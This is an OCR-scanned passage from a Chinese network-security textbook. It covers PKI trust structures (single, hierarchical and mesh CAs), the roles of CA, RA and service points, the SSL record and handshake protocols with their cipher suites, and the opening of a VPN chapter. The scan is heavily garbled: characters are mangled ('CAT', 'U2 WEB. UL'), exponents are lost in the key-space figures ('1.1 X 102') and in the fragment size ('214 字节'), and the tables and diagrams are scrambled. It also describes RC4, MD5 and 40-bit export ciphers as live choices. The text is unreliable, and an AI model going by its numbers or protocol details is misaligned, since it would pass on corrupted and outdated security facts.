这 些 用 户 之 间 交 换 的 密 钥 信息 是 没有 价值 的 ,因为 密 钥 信息 本 身 就 不 被 信任 。 直 接 信任 如 
图 3.25 所 示 。 
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图 3.25 直接 信任 


2. PKI 的 体系 结构 

CA 是 PKI 的 核心 ,根据 CA 之 间 的 关系 ,PKI 的 体系 结构 可 以 有 3 种 情况 : 单个 结构 
的 CA, 分 级 (层次 ) 结 构 的 CA 和 网 状 结构 的 CA。 

(1) 单个 结构 的 CA 

单个 结构 的 CA 是 最 基本 的 PKI 结构 ,PKI 中 的 所 有 用 户 对 此 单个 CA 给 予 信任 , 它 是 
PKI 系统 内 单一 的 用 户 信 任 点 , 它 为 PKI 中 的 所 有 用 户 提供 PKI 服务 。 

这 种 结构 只 需 建 立 一 个 根 CA, 所 有 的 用 户 都 能 通过 该 CA 实现 相互 认证 ,但 单个 结构 
的 CA 不 易 扩展 到 支持 大 量 的 或 不 同 的 群体 的 用 户 。 

(2) 分 级 (层次 ) 结 构 的 CA 

在 现实 生活 中 ,一 个 证 书 机 构 很 难得 到 所 有 用 户 的 信赖 并 接受 它 所 发 行 的 所 有 用 户 证 
书 , 而 且 这 个 证 书 机 构 也 很 难 对 所 有 潜在 注册 用 户 有 足够 全 面 的 了 解 , 这 就 需要 多 个 CA。 
可 以 使 用 主 从 关系 或 使 用 对 等 关系 将 单个 独立 的 CA 扩展 成 支持 不 同 群 体 的 更 大 的 、 更 为 
多 样 化 的 PKI。 

一 个 以 主 从 CA 关系 建立 的 PKI 称 为 分 级 (层次 ) 结 构 的 PKI。 在 这 种 结构 下 ,所 有 的 
用 户 都 信任 最 高 层 的 根 CA, 上 一 层 CA 向 下 一 层 CA 发 放 公 钥 证 书 。 若 一 个 持 有 由 特定 
CA 发 证 的 公 钥 用 户 要 与 由 另 一 个 CA 发 放 公 钥 证 书 的 用 户 进行 安全 通信 ,需要 解决 跨 域 
的 认证 ,这 一 认证 过 程 在 于 建立 一 个 从 根 出 发 的 可 信赖 的 证 书 链 。 

分 级 结构 的 PKI 系 统 易于 升级 和 增加 新 的 认证 域 用 户 , 因 为 只 需要 根 CA 与 该 认证 域 
的 CA 建立 信任 关系 。 证 书 路 径 由 于 其 单 向 性 ,可 生成 从 用 户 证 书 到 可 信任 点 的 简单 的 、 相 
对 较 短 的 路 径 。 用 户 基 于 分 级 结构 的 CA 中 的 位 置 可 隐 含 地 知道 一 个 证 书 用 于 哪 种 应 用 。 

分 级 结构 的 PKI 依赖 于 一 个 单一 的 可 信任 点 的 根 CA。 根 CA 安全 性 的 削弱 ,将 导致 
整个 PKI 系 统 安全 性 的 削弱 , 根 CA 的 故障 对 整个 PKI 系 统 是 灾难 性 的 。 如 果 要 构建 一 个 
全 球 共同 的 根 CA 可 能 在 政治 上 是 无 法 做 到 的 。 另 外 ,由 一 组 彼此 分 离 的 CA 过 渡 到 分 级 
结构 的 PKI, 算 法 的 多 样 性 更 加 深 了 互通 操作 的 复杂 程度 。 

(3) 网 状 结构 的 CA 

以 对 等 CA 关系 建立 的 交叉 认证 扩展 了 CA 域 之 间 的 第 三 方 信任 关系 ,这 样 的 PKI 系 
统称 为 网 状 结构 的 PKI。 

交叉 认证 是 指 以 下 两 个 操作 。 

第 一 个 操作 是 两 个 域 之 间 信 任 关系 的 建立 ,这 通常 是 一 个 一 次 性 操作 。 在 双边 交叉 认 
证 的 情况 下 ,每 个 CA 签发 一 张 “ 交 叉 证 书 ”。 

第 二 个 操作 由 客户 端 软件 来 做 。 这 个 操作 包含 了 验证 由 已 经 交叉 认证 的 CA 签发 的 用 
户 证 书 的 可 信赖 性 ,这 个 操作 需要 经 常 执行 。 


例如 ,CAl、CA2 通过 相互 颁发 证 书 ,来 实现 两 个 信任 域内 网 络 用 户 的 相互 信任 。U1 
如 果 要 验证 U2 证 书 的 合法 性 , 则 首先 需要 验证 CA2 对 U2 证 书 的 签名 ,然后 验证 CAT 对 
CA2 证 书 的 签名 ,因为 Ul 信任 CAl1, 所 以 信任 U2 WEB. UL 通过 这 样 一 个 证 书 链 来 验证 


U2 证 书 的 合法 性 。 交 叉 认 证 如 图 3.26 所 示 。 
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图 3.26 交叉 认证 
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通常 ,用 户 信任 为 他 们 发 放 证 书 的 CA,CA 之 间 相 互 发 放 证 书 ,网 状 PKI 中 的 所 有 CA 
都 可 能 是 可 信任 点 ,证 书 对 描述 了 他 们 双向 的 信任 关系 ,然而 , 正 因为 这 种 双向 的 可 信任 模 
型 ,所 以 从 用 户 证 书 到 可 信任 点 建立 证 书 的 路 径 是 不 确定 的 ,存在 多 种 路 径 的 选择 ,使 得 路 


径 发 现 较为 困难 。 
3. CTCA 的 体系 结构 


完整 的 PKI 包括 认证 策略 的 制定 (包括 遵循 的 技术 标准 、 各 CA 之 间 的 上 下 级 或 同 级 


关系 、 安 全 策略 .安全 程度 .服务 对 象 .管理 原则 和 
框架 等 )` 认 证 规则 .运作 制度 的 制定 .所 涉及 各 方 
法 律 关系 的 内 容 及 技术 的 实现 。 

从 功能 上 来 说 ,一 个 CA 可 以 划分 为 接受 用 
户 证 书 申请 的 证 书 受理 者 (RS) ,证书 发 放 的 审核 
部 门 (Registration Authority, RA) 证书 发 放 的 
操作 部 门 (CP) ,以 及 记录 证 书 作废 的 证 书 作 上 废 表 
(又 称 为 黑 名 单 CRL) ,如 图 3. 27 所 示 。 


CP 


CRL 


图 3.27 CA 构成 


Tkr 


业务 受理 点 


。 证 书 发 放 审核 部 门 (RA) : 负责 对 证 书 申请 者 进行 资格 审查 ,并 决定 是 否 同 意 给 该 
申请 者 发 放 证 书 , 如 果 审 核 错 误 或 为 不 满足 资格 的 申请 者 发 放 了 证 书 , 所 引起 的 一 


切 后果 都 由 该 部 门 承担 。 


。 证 书 发 放 的 操作 部 门 (CP) : 负责 为 已 授权 的 申请 者 制作 、 发 放 和 管理 证 书 , 并 承 当 
因 操作 运营 错误 所 造成 的 一 切 后 果 , 包 括 失 密 或 为 没有 获得 授权 者 发 放 证 书 等 , 它 
可 以 由 审核 授权 部 门 自己 担任 ,也 可 以 委托 给 第 三 方 担任 。 


使 用 者 在 认证 与 之 通信 的 对 方 证 书 是 否 作废 时 查询 。 


证 书 受 理 者 (RS) : 用 于 接受 用 户 的 证 书 申请 请 求 ,转发 给 CP 和 RA 进行 响应 的 处 理 。 
证 书 作废 表 (CRL): 其 中 记录 尚未 过 期 但 已 经 声明 作废 的 用 户 证 书 序列 号 , 供 证 书 


业务 受理 点 : 作为 CA 系统 对 外 提供 服务 的 一 个 窗口 ,为 用 户 提供 面对面 的 证 书 申 


请 和 发 放 服 务 ,同时 业务 受理 点 可 以 担任 用 户 证 书 发 放 的 审核 部 门 ,当面 审核 用 户 


提交 的 资料 ,决定 是 否 为 用 户 发 放 证 书 。 
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下 面 介 绍 一 个 具体 的 PKI 体系 结构 ,由 以 下 几 个 部 分 组 成 。 

CD 认证 中 心 (CA) 

CA 在 PKI 中 扮演 可 信任 的 代理 角色 。 只 要 用 户 相信 一 个 CA 及 其 发 行 和 管理 证 书 的 
商业 策略 ,用 户 就 能 相信 由 该 CA 颁发 的 证 书 , 即 第 三 方 信任 。CA 负责 产生 、 分 配 并 管理 
PKI 结构 下 的 所 有 用 户 的 证 书 , 把 用 户 的 公 钥 和 其 他 信息 捆绑 在 一 起 ,在 证 书 上 的 CA 的 签 
名 保证 了 证 书 的 内 容 不 被 算 改 。 

认证 机 构 在 发 放 证 书 时 要 遵循 一 定 的 准则 ,如 要 保证 自己 发 出 的 证 书 的 序列 号 没有 相 
同 的 ,没有 两 个 不 同 的 实体 获得 的 证 书 中 的 主体 内 容 是 一 致 的 ,不 同 主体 内 容 的 证 书 所 包含 
的 公开 密 钥 是 不 相同 等 。 

CA 的 功能 有 证 书 发 放 、 证 书 更 新 .证 书 撤销 和 证 书 验证 。 它 的 核心 功能 就 是 发 放 和 管 
理 数字 证 书 , 具 体 描述 如 下 : 签发 自 签名 的 根 证 书 、 审 核 和 签发 其 他 CA 系统 的 交叉 认证 证 
书 、 向 其 他 CA 系统 申请 交叉 认证 证 书 、 受 理 和 审核 各 注册 审批 机 构 (RA) 的 申请 ,为 RA 机 
构 签 发 证 书 、 接 收 并 处 理 各 RA 服务 器 的 证 书 业务 请 求 ,证书 的 审批 (确定 是 否 接 受用 户 数 
字 证 书 的 申请 ) ,证 书 的 发 放 ( 向 申请 者 颁发 或 拒绝 颁发 数字 证 书 )、 证 书 的 更 新 (接收 并 处 理 
最 终 用 户 的 数字 证 书 更 新 请 求 )、 接 收 用 户 数字 证 书 的 撤销 请 求 、 产 生 和 发 布 证 书 作 废 表 
CRL(Certificate Revocation List) ,管理 全 系统 的 用 户 资料 ,管理 全 系统 的 证 书 资料 .维护 全 
系统 的 证 书 作 上 废 表 、 维 护 全 系统 的 证 书 在 线 验 证 系统 OCSP (Online Certificate Status 
Authentication System) 查 询 数据 、 密 钥 备 份 `. 历 史 数据 归档 。 

(2) 注册 审批 机 构 (RA) 

RA 是 CA 的 证 书 发 放 、 管 理 的 延伸 。 它 负责 证 书 申请 者 的 信息 录入 、 审 核 以 及 证 书 发 
放 等 工作 ,同时 ,对 发 放 的 证 书 完成 相应 的 管理 功能 。RA 系统 是 整个 CA 得 以 正常 运营 不 
可 缺少 的 一 部 分 。 在 RA 的 下 层 还 可 以 有 多 个 业务 受理 点 (RS)。CA、RA 和 RS zii] fiie 
辑 结构 如 图 3. 28 所 示 。 


图 3.28 CA/RA 和 业务 受理 点 之 间 的 逻辑 结构 


RA 的 功能 是 : 受理 用 户 证 书 业 务 ; 审核 用 户 身 份 ; 向 CA 申请 签发 证 书 ; 将 证 书 和 私 
钥 写 入 IC 卡 后 分 发 给 受理 中 心 . 业 务 受理 点 或 用 户 ; 管理 本 地 OCSP 服务 器 并 提供 证 书 状 
态 的 实时 查询 ; 管理 本 地 用 户 资料 。 

(3) 业务 受理 点 

业务 受理 点 的 功能 是 : 管理 所 辖 受理 点 用 户 资料 .受理 用 户 证 书 业 务 、 审 核 用 户 身 份 、 
向 受理 中 心 或 RA 申请 签发 证 书 , 将 RA 或 受理 中 心 制作 的 证 书 介质 分 发 给 用 户 。 

一 个 典型 的 PKI 体系 结构 如 图 3. 29 所 示 , 其 中 包括 PKI 策略 、 软 硬件 系统 、 证 书 机 构 
CA .注册 机 构 RA ,证书 发 布 系统 和 PKI 应 用 等 。 


(D PKI 安 全 策略 建立 和 定义 了 一 个 组 织 信息 安全 方面 的 指导 方针 ,同时 也 定义 了 密码 
系统 使 用 的 处 理 方法 和 原则 。 它 包括 一 个 组 织 怎样 处 理 密 钥 和 有 价值 的 信息 ,根据 风险 的 
级 别 定义 安全 控制 的 级 别 。 

© 证 书 机 构 CA 是 PKI 的 信任 基础 , 它 管 理 公 钥 的 整个 生命 周期 ,其 作用 包括 发 放 证 
书 ,规定 证 书 的 有 效 期 和 通过 发 布 证 书 作 废 表 (CRL) 确 保 必 要 时 可 以 废除 证 书 。 

C 注册 机 构 RA 提供 用 户 和 CA 之 间 的 一 个 接口 , 它 获取 并 认证 用 户 的 身份 ,向 CA 提 


@ 证 书 发 布 系统 负责 证 书 的 发 放 , 如 可 以 通过 用 户 自己 或 目录 服务 。 目 录 服 务 器 可 以 
是 一 个 组 织 中 现存 的 或 PKI 方 案 中 提供 的 。 
© PKI 应 用 非常 广泛 ,包括 在 Web 服务 器 和 Web 浏览 器 之 间 的 通信 、 电 子 邮 件 、 电 子 


数据 交换 (EDI) ,在 Internet. 上 的 交易 和 虚拟 私有 网 (VPN) 等 。 


图 3.29 PKI 体系 结 构 


3.9 SSL 


3.9.1 SSL 协议 概述 


提供 网 络 安 全 服务 可 以 在 不 同 层次 提供 。 一 个 通用 的 解决 方法 是 在 网 络 层 使 用 
IPSec, IPSec 对 于 最 终 用户 和 应 用 程序 是 透明 的 。 另 一 个 比较 通用 的 解决 方法 是 在 TCP 上 
实现 安全 性 ,在 这 一 级 中 有 两 种 实现 选择 : 一 是 SSL( 或 TLS) 可 以 作为 基本 协议 族 的 一 个 
部 分 提供 ,因此 对 应 用 程序 透明 ; 二 是 将 SSL 嵌入 到 软件 中 ,如 嵌入 到 Web 浏览 器 与 Web 
服务 器 。 与 应 用 程序 有 关 的 安全 服务 也 可 以 被 嵌入 到 特定 的 应 用 程序 中 ,如 安全 电子 交易 


(SET),TCP/IP 协议 栈 中 安全 机 制 的 位 置 如 图 3. 30 所 示 。 


HTTP EIP SMTP S/MIME PGP SET 
HTTP FTP SMTP SSL or TLS Kerberos SMTP | HTTP 
TCP TCP UDP TCP 


IP/IPSec 


IP 


图 3. 30 TCP/IP 协议 栈 中 安全 机 制 的 位 置 
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Netscape 公司 推出 Web 浏览 器 时 ,提出 了 SSL(Secure Socket Layer) 安 全 通信 协议 ， 
SSL 协议 目前 已 成 为 Internet 上 保密 通信 的 工业 标准 。 现 行 Web 浏览 器 普遍 将 HTTP 和 
SSL 相 结 合 ,来 实现 安全 通信 。 

IETFCwww. ietf. org) 将 SSL 做 了 标准 化 , 即 RFC2246 ,并 将 其 称 为 TLSCTransport 
Layer Security) ,从 技术 上 来 讲 ,TLS1.0 与 SSL3. 0 的 差别 非常 微小 。 

在 WAP 的 环境 下 ,由 于 手机 及 手持 设备 的 处 理 和 存储 能 力 有 限 , WAP 论坛 (www. 
wapforum. org) 在 TLS 的 基础 上 做 了 简化 ,提出 了 WTLS 协议 (Wireless Transport Layer 
Security) ,以 适应 无 线 的 特殊 环境 。 

SSL 采用 公开 密 钥 技术 。 其 目标 是 保证 两 个 应 用 层 之 间 通 信和 的 保密 性 和 可 靠 性 ,可 在 
服务 器 和 客户 机 两 端 同时 实现 支持 。 它 能 使 客户 /服务 器 应 用 之 间 的 通信 不 被 攻击 者 窃听 ， 
并 且 始 终 对 服务 器 进行 认证 ,还 可 选择 对 客户 进行 认证 。SSL 协议 要 求 建 立 在 可 靠 的 传输 
层 协议 (如 TCP) 之 上 。SSL 协议 的 优势 在 于 它 是 与 应 用 层 协议 独立 无 关 的 ,高 层 的 应 用 层 
协议 (如 HTTP,FTP,Telnet) 能 透明 的 建立 于 SSL 协议 之 上 。SSL 协议 在 应 用 层 协 议 通 
信之 前 就 已 经 完成 加 密 算 法 .通信 密 钥 的 协商 及 服务 器 认证 工作 。 

如 果 利 用 SSL 协议 来 访问 网 页 ,其 步骤 如 下 : 

CD 用 户 : 在 浏览 器 的 地 址 栏 中 输入 https://www. sslserver. com, 

(2) HTTP JZ: 将 用 户 需 求 翻译 成 HTTP 请 求 , 如 GET /index. htm HTTP/1. 1; 
Host http://www. sslserver. com, 

(3) SSL 层 : 借助 下 层 协议 的 信道 ,安全 地 协商 出 一 份 加 密 密 钥 ,并 用 此 密 钥 来 加 密 
HTTP 请 求 。 

(4) TCP J£; 与 Web Server 的 443 端口 建立 连接 ,传递 SSL 处 理 后 的 数据 。 

接收 端 与 此 过 程 相反 。 

SSL 协议 允许 支持 SSL 协议 的 服务 器 与 一 个 支持 SSL 协议 的 客户 机 相互 认证 ,还 允许 
这 两 个 机 器 间 建 立 加 密 连 接 ,提供 连接 可 靠 性 。 

SSL 服务 器 认证 允许 用 户 确 认 服 务 器 身份 。 支 持 SSL 协议 的 客户 机 软件 能 使 用 公 钥 
密码 标准 技术 (如 用 RSA 和 DSS 等 ) 检 查 服务 器 证 书 、 公 用 ID 是 否 有 效 和 是 否 由 在 客户 信 
任 的 认证 机 构 CA 列表 内 的 认证 机 构 发 放 。 

SSL 客户 机 认证 允许 服务 器 确认 用 户 身 份 。 使 用 应 用 于 服务 器 认证 同样 的 技术 ,支持 
SSL 协议 的 服务 器 软件 能 检查 客户 证 书 、 公 用 ID 是 否 有 效 和 是 否 由 在 服务 器 信任 的 认证 
机 构 CA 列表 内 的 认证 机 构 发 放 。 

一 个 加 密 的 SSL 连接 要 求 所 有 在 客户 机 与 服务 器 之 间 发 送 的 信息 由 发 送 方 软件 加 密 
和 由 接收 方 软件 解密 ,对 称 加 密 法 用 于 数据 加 密 ( 如 用 DES 和 RC4 等 ), 从 而 连接 是 保密 
的 。 所 有 通过 加 密 SSL 连接 发 送 的 数据 都 被 一 种 检测 自 改 的 机 制 所 保护 ,使 用 消息 认证 码 
(MAC) 的 消息 完整 性 检查 .安全 散 列 函数 (如 SHA 和 MD5 等 ) 用 于 消息 认证 码 计算 ,这 种 
机 制 自动 地 决定 传输 中 的 数据 是 否 已 经 被 更 改 , 从 而 连接 是 可 靠 的 。 

SSL 协议 支持 如 下 一 些 使 用 RSA 密 钥 交 换算 法 的 密码 组 ,它们 的 加 密 强 度 由 强 到 弱 排 列 : 

(D f SHA-1 消息 认证 .支持 168 位 加 密 的 Triple-DES, 速 度 不 如 RC4 快 。 由 于 密码 
长 度 较 大 ,大 约 有 3.7 X 10” 个 密码 可 用 。 

Q 带 MD5 消息 认证 ,支持 128 位 加 密 的 RC4,RC4 和 RC2 都 有 128 位 的 密码 ,它们 的 


加 密 强 度 仅 次 于 Triple-DES.. RC4 和 RC? 大 约 有 3.4 X 10” 个 密码 可 用 ,这 使 得 它们 很 难 


被 破解 。RC4 密码 是 SSL 支持 的 密码 中 速度 最 快 的 。 


@ iif MD5 ij iA iE, Sc Pj 128 位 加 密 的 RC2, RC2 pb RC4 速度 慢 (SSL3. 0 支持 而 


SSL2.0 不 支持 )。 


@ 带 SHA-1 消息 认证 ,支持 56 位 加 密 的 DES, 大 约 有 7.2 X 10 "个 密码 可 用 (在 


SSL2.0 中 该 密码 使 用 的 是 MD5 消息 认证 )。 


根据 美国 政府 的 规定 ,以 上 4 种 加 密 仅 能 在 美国 境内 使 用 ,以 下 加 密 技 术 是 可 以 出 口 的 。 
(D 带 MD5 消息 认证 ,支持 40 位 加 密 的 RC4, 大 约 有 1.1 X 102 个 密码 可 用 。 

Q 带 MD5 消息 认证 ,支持 40 位 加 密 的 RC2, 大 约 有 1.1 X 10* 个 密码 可 用 。 

注意 : 对 RC2 和 RC4 支持 40 位 加 密 , 其 中 密 钥 仍 是 128 位 的 ,但 只 有 40 位 有 加 密 意 义 。 
不 加 密 , 只 带 MD5 消息 认证 。 这 种 方法 使 用 MD5 消息 认证 检测 算 改 (SSL3. 0 支持 而 


SSL2.0 不 支持 )。 


SSL 主要 工作 流程 包括 : 网 络 连 接 建 立 ; 与 该 连接 相关 的 加 密 方式 和 压缩 方式 选择 ; 
双方 的 身份 识别 ; 本 次 传输 密 钥 的 确定 ; 加 密 的 数据 传输 ; 网 络 连接 的 关闭 。 


应 用 数据 的 传输 过 程 如 下 : 
(1) 应 用 程序 把 应 用 数据 提交 给 本 地 的 SSL; 
(2) 发 送 端 根据 需要 ,使 用 指定 的 压缩 算法 ,压缩 应 用 数据 


(3) 发 送 端 使 用 散 列 算法 对 压缩 后 的 数据 进行 散 列 ,得 到 数据 的 散 列 值 ; 
(4) 发 送 端 把 散 列 值 和 压缩 后 的 应 用 数据 一 起 用 加 密 算法 加 密 ; 


(5) 密 文通 过 网 络 传送 给 对 方 ; 
(6) 接收 方 用 相同 的 加 密 算法 对 密 文 解密 ,得 到 明文 ; 
(7) 接收 方 用 相同 的 散 列 算法 对 明文 中 的 应 用 数据 散 列 ; 


(8) 计算 得 到 的 散 列 值 与 明文 中 的 散 列 值 比较 。 如 果 一 致 , 则 明文 有 效 ,接收 方 的 SSL 
把 明文 解压 后 得 到 应 用 数据 上 交 给 接收 方 的 应 用 。 否 则 就 丢弃 数据 ,并 向 发 送 方 发 出 告 


信息 。 严 重地 错误 有 可 能 引起 再 次 的 协商 或 连接 中 断 。 


SSL 协议 建立 在 传输 层 和 应 用 层 之 间 ,包括 两 个 子 协 议 : SSL 记录 协议 和 SSL 握手 协 


议 , 其 中 记录 协议 在 握手 协议 下 端 ,其 结构 如 图 3. 31 所 示 。 


SSL 握手 协议 SSL 改变 密码 格式 协议 | SSL 警告 协议 


HTTP FIP 


SSL 记录 协议 


TCP 


IP 


图 3.31 SSL 协议 结构 


SSL 记录 协议 定义 了 要 传输 数据 的 格式 , 它 位 于 一 些 可 靠 的 传输 协议 之 上 


用 于 各 种 更 高 层 协议 的 封装 。SSL 握手 协议 就 是 这 样 一 个 被 封装 的 协议 ,允许 
户 机 在 应 用 程序 传输 和 接收 数据 之 前 互相 认证 ,协商 加 密 算法 和 密 钥 。 


3.9.2 SSL 记录 协议 


SSL 记录 协议 为 SSL 连接 提供 两 种 服务 : 机 密 性 和 报 文 完整 性 。 


《如 TCP)， 
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在 SSL 协议 中 ,所 有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 长 度 不 为 0 的 
记录 数据 组 成 。 所 有 的 SSL 通信 都 使 用 SSL 记录 层 , 记 录 协 议 封 装 上 层 的 握手 协议 、 警 告 协 
议 ,改变 密码 格式 协议 和 应 用 数据 协议 。SSL 记录 协议 包括 了 记录 头 和 记录 数据 格式 的 规定 。 

其 主要 的 操作 如 图 3. 32 所 示 。 


uod [esee ap mmi] 
(048 a NN |. 
Q 压缩 

(3) 增加 MAC 

Omk 


(5) 增加 SSL 记 录 头 
图 3.32 SSL 记录 协议 的 操作 


CD 分 段 。 每 个 上 层 应 用 数据 被 分 成 214 字 节 或 更 小 的 数据 块 。 记 录 中 包含 类 型 .版 
本 号 .长 度 和 数据 字段 。 

(2) 压缩 。 压 缩 是 可 选 的 ,并 且 是 无 损 压 缩 , 压 缩 后 内 容 长 度 的 增加 不 能 超过 1024 字 节 。 

G) 在 压缩 数据 上 计算 消息 认证 MAC, 

CD 对 压缩 数据 及 MAC 进行 加 密 。 

(5) 增加 SSL 记录 头 。 

SSL 记录 协议 字段 包括 ， 

。 内 容 类 型 (8 位 ) : 封装 的 高 层 协议 。 

。 主要 版 本 (8 位 ): 使 用 的 SSL 主要 版 本 。 对 于 SSLv3. 0, 值 为 3。 

。 次 要 版 本 (8 位 ) : 使 用 的 SSL 次 要 版 本 。 对 于 SSLv3. 0, 值 为 0。 

。 压缩 长 度 (16 位 ): 明文 数据 (如 果 选 用 压缩 则 是 压缩 数据 ) 以 字 节 为 单位 的 长 度 。 

SSL 记录 协议 字段 如 图 3. 33 所 示 。 


内 容 类 型 主要 版 本 次 要 版 本 压缩 长 度 
明文 (压缩 可 选 ) 
MAC(0,16 或 20 位 ) 


图 3.33 SSL 记录 协议 字段 


已 经 定义 的 内 容 类 型 是 握手 协议 ,警告 协议 ,改变 密码 格式 协议 和 应 用 数据 协议 。 其 中 
改变 密码 格式 协议 是 最 简单 的 协议 ,这 个 协议 由 值 为 1 的 单字 节 报 文 组 成 ,用 于 改变 连接 使 
用 的 密 文 族 。 警 告 协议 用 来 将 SSL 有 关 的 警告 传送 给 对 方 。 警 告 协议 的 每 个 报 文 由 两 个 
字 节 组 成 ,第 一 字 节 指明 级 别 (1 警告 或 2 致命 ) ,第 二 字 节 指明 特定 警告 的 代码 。 


3.9.3 SSL 3$ 4 £x 


SSL 握手 协议 被 封装 在 记录 协议 中 ,该 协议 允许 服务 器 与 客户 机 在 应 用 程序 传输 和 接 
收 数据 之 前 互相 认证 、 协 商 加 密 算法 和 密 钥 。 在 初次 建立 SSL 连接 时 服务 器 与 客户 机 交换 
一 系列 消息 。 


这 些 消息 交换 能 够 实现 如 下 操作 : 
。 客户 机 认证 服务 器 ; 

。 允许 客户 机 与 服务 器 选择 双方 都 支持 的 密码 算法 ; 
。 可 选择 的 服务 器 认证 客户 ; 

。 使 用 公 钥 加 密 技术 生成 共享 密 钥 ; 
。 建立 加 密 SSL 连接 。 

SSL 握手 协议 报 文 头 包 括 3 个 字段 。 


。 类 型 (1 字 节 ): 该 字段 指明 使 用 的 SSL 握手 协议 报 文 类 型 。 
括 10 种 类 型 。 


。 长 度 (3 字 节 ): 以 字 节 为 单位 的 报 文 长 度 。 
。 ARL SE. 使 用 报 文 的 有 关 参 数 。 


SSL 1€ 3 


报 文 类 型 


手 协议 报 文 类 型 及 参数 如 表 3. 1 所 示 。 


表 3.1 SSL 握手 协议 报 文 类 型 及 参数 


2 "un 


SSL 握手 协议 报 文 包 


hello_request 


client_hello 


server_hello 


certificate 


server key exchange 
certificate request 


server do 


certificate verify 
client key exchange 


finished 


ne 


SSL 握手 协议 的 过 程 ,如 图 3. 34 所 示 。 
服务 器 


a) 


(2) 


3) 


(4) 


client hello 
server hello 


certificate* 
server key exchange* 
certificate requeset* 


A 
server hello done 
一 一 一 一 一 一 


certificate* 
client key exchange 


client verity* 


change cipher spec 


finished 
change cipher spec 
finished 


版 本 .随机 数 、 会 话 ID、 密 文 族 .压缩 方法 
版 本 .随机 数 .会话 ID EOK .压缩 方法 
X. 509v3 证 书 链 

参数 ,签名 


类 型 .授权 


2 


签名 
参数 、 签 名 
Hash 值 


建立 协议 版 本 、 会 话 ID 、 密 文 
族 、 压 缩 方法 、 交 换 随 机 数 


客户 证 书 


修改 密 文 族 并 结束 握手 协议 


ik. 带 * 的 传输 是 可 选 的 ， 或 者 与 站 点 相关 的 ， 并 不 总 是 发 送 的 报 文 。 
图 3. 34 握手 协议 的 过 程 
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Bow 
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(1) 建立 安全 能 力 

客户 机 向 服务 器 发 送 client_hello 报 文 ,服务 器 向 客户 机 回应 server_hello 报 文 ,建立 如 
下 的 安全 属性 : 协议 版 本 ,会话 有 D、 密 文 族 、 压 缩 方 法 ,同时 生成 并 交换 用 于 防止 重 放 攻击 
的 随机 数 。 密 文 族 参数 包括 密 钥 交换 方法 (Deffie-Hellman 密 钥 交 换算 法 、 基 于 RSA 的 密 
钥 交 换 和 另 一 种 实现 在 Fortezza chip 上 的 密 钥 交 换 )、 加 密 算 法 (DES、 RC4、RC2、3DES 
等 )、MAC 算 法 (MD5 或 SHA-1)、 加 密 类 型 ( 流 或 分 组 ) 等 内 容 。 

(2) 认证 服务 器 和 密 钥 交换 

在 hello 报 文 之 后 ,如 果 服 务 器 需要 被 认证 ,服务 器 将 发 送 其 证 书 。 如 果 需 要 ,服务 器 
还 要 发 送 server_key_exchange。 然 后 ,服务 器 可 以 向 客户 发 送 certificate_request 请 求证 
书 。 服 务 器 总 是 发 送 server hello done 报 文 ,指示 服务 器 的 hello 阶段 结束 。 

(3) 认证 客户 和 密 钥 交换 

客户 一 旦 收 到 服务 器 的 server hello done 报 文 ,客户 将 检查 服务 器 证 书 的 合法 性 (如 
果 服 务 器 要 求 ) ,如 果 服 务 器 向 客户 请 求 了 证 书 ,客户 必须 发 送 客户 证 书 ,然后 发 送 client_ 
key. exchange 报 文 , 报 文 的 内 容 依赖 于 client_hello 与 server hello 定义 的 密 钥 交换 的 类 
型 。 最 后 ,客户 可 能 发 送 client. verify 报 文 来 校 验 客户 发 送 的 证 书 , 这 个 报 文 只 能 在 具有 签 
名 作用 的 客户 证 书 之 后 发 送 。 

(4) 结束 

客户 发 送 change_cipher_spec 报 文 并 将 挂 起 的 CipherSpec 复制 到 当前 的 CipherSpec。 
这 个 报 文 使 用 的 是 改变 密码 格式 协议 。 然 后 ,客户 在 新 的 算法 、 对 称 密 钥 和 MAC 秘密 之 下 
立即 发 送 finished 报 文 。finished 报 文 验 证 密 钥 交换 和 鉴别 过 程 是 成 功 的 。 服 务 器 对 这 两 
个 报 文 响应 ,发 送 自己 的 change_cipher_spec 报 文 ,finished 报 文 。 握 手 结束 ,客户 与 服务 器 
可 以 发 送 应 用 层 数据 了 。 

当 客户 从 服务 器 端 传送 的 证 书 中 获得 相关 信息 时 ,需要 检查 以 下 内 容 来 完成 对 服务 器 
的 认证 : 时 间 是 否 在 证 书 的 合法 期 限 内 ; 签发 证 书 的 机 关 是 否 客户 端 信 任 的 ; 签发 证 书 的 
公 钥 是 否 符合 签发 者 的 数字 签名 ; 证 书 中 的 服务 器 域名 是 否 符合 服务 器 自己 真正 的 域名 。 
服务 器 被 验证 成 功 后 ,客户 继续 进行 握手 过 程 。 

同样 的 ,服务 器 从 客户 传送 的 证 书 中 获得 相关 信息 认证 客户 的 身份 ,需要 检查 以 下 内 容 
来 完成 对 客户 的 认证 : 用 户 的 公 钥 是 否 符合 用 户 的 数字 签名 ; 时 间 是 否 在 证 书 的 合法 期 限 
内 ; 签发 证 书 的 机 关 是 否 服务 器 信任 的 ; 用 户 的 证 书 是 否 被 列 在 服务 器 的 LDAP 里 用 户 的 
信息 中 ; 得 到 验证 的 用 户 是 否 仍然 有 权限 访问 请 求 的 服务 器 资源 。 


第 4 章 VPN 技 术 


虚拟 专用 网 (Virtual Private Network ,VPN) 是 企业 网 在 因特网 等 公共 网 络 上 的 延伸 ， 
可 以 帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙 伴 及 供应 商 同 公司 的 内 部 网 建立 可 信 的 安全 连 
接 , 并 保证 数据 的 安全 传输 ,本 章 将 从 VPN 的 功能 ,分 类 、 各 种 基于 隧道 协议 的 VPN 技术 
等 方面 详细 介绍 VPN 技术 。 


4.1 VPN 概 述 


随 着 信息 时 代 的 到 来 ,企业 越 来 越 依赖 于 网 络 进 行 生产 和 商业 活动 。 许 多 企业 或 机 构 
使 用 外 部 的 专用 网 络 与 远程 站 点 与 其 他 企业 、 机 构 进 行 相互 的 通信 。 专 用 网 络 是 向 
Internet 服务 提供 商 (ISP) 租 用 的 线路 。 这 些 线 路 是 一 种 点 对 点 的 线路 ,一 条 线路 只 能 被 一 
个 公司 或 企业 所 占用 ,这 使 得 线路 上 传送 的 数据 能 够 与 其 他 通信 数据 相隔 离 。 通 过 使 用 专 
用 网 络 ,远程 用 户 便 可 以 立即 交换 信息 ,但 是 租用 专用 线路 的 花 销 大 成 本 高 ,因此 ,专用 网 
络 的 使 用 很 难 普 及 。 

虚拟 专用 网 (VPN) 是 指 通 过 共享 的 公共 网 络 (通常 是 Internet) 建 立 一 个 安全 可靠 、 临 
